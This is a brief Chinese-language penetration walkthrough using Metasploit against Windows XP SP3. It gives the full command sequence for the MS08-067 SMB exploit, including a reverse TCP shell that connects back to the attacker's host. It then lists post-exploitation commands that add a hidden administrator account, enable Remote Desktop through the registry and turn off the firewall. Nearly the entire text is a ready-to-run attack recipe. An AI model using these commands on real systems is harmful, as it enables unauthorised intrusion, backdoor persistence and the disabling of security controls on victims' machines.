工具:metasploit,目标系统 windows xp sp3 English
渗透攻击过程
1.search MS08-067
2. use exploit/windows/smb/ms08_067_netapi
3. show payloads
4. set payload generic/shell_reverse_tcp
5. show targets
6. show options
7. set RHOST 192.168.1.159
8. set LHOST 192.168.1.36
9. exploit
提权过程
>net user lilei 123456 /add --添加用户
>net localgroup administrators lilei /add --将lilei添加到administrators用户组
>netstat -na --查看开放端口
>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f --打开远程桌面3389端口
>netsh firewall set opmode disable --关闭防火墙